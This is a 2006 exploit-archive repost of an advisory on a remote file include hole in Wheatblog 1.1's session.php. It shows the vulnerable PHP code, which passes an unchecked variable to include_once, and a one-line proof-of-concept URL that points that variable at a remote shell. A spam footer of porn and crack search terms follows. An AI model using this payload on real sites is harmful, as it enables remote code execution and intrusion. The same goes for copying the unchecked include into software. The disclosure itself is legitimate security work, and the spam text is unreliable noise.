about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Wheatblog <= 1.1 (session.php) Remote File Include Vulnerability




2006-08-11 Wheatblog <= 1.1 (session.php) Remote File Include Vulnerability
Rated as : High Risk

###########################################################################################
#                                   Aria-Security.net Advisory            
               #
#                                 Discovered  by: O.U.T.L.A.W             
               #
#                                < www.Aria-security.net >          
                     #
#                      Gr33t to: A.u.r.a  & l2odon & DrtRp & Sh3ll        
               #              
###########################################################################################


<?php
include_once("$wb_class_dir/classDatabase.php");


function Start_Session()
{
    global $session_dir;

    if ( $session_dir != '' )
        session_save_path($session_dir);

    if ( ! isset($_SESSION) )
    {
        session_start();
        // Supposedly a fix for IE6
        header('Cache-control: private');
        My_Cache();

        if ( ! isset($_SESSION['db']) || gettype($_SESSION['db']->db)
!= 'resource')
            touchDatabaseSession();

    }
}


***********************************************************************

Proof of Concept:
www.site.com/includes/session.php?wb_class_dir=SHELL

Contact : Outlaw@aria-security.net
securitydot.net - 2006-08-11

Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 07:06:26 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Www.tube8. viduosex Www.WORLD. Free . Sax www.tcjob. Pussy sex tooi news for C Youjizz all photo www.xilew. Www.Bollyw lite 1.0.2 www.tjpeix Sexy photo k-shop Wwwbugilco www.sexv.c www.landon www.ynzql. news for C GID 103 router cis www.tjpeix mr india www.indian XXX VIDEO Bob mambo+Remo os commerc pornic sek thirisa.se www.wholin poll_cooki XXX VIDEO Www.arabia kernel 2.4 www.tushu5 8th class exim 4.63 FreePBX Gambar sex Word video Crack+Data Crack Data Word video Www.nameta trap video CATEGORI xxx porn p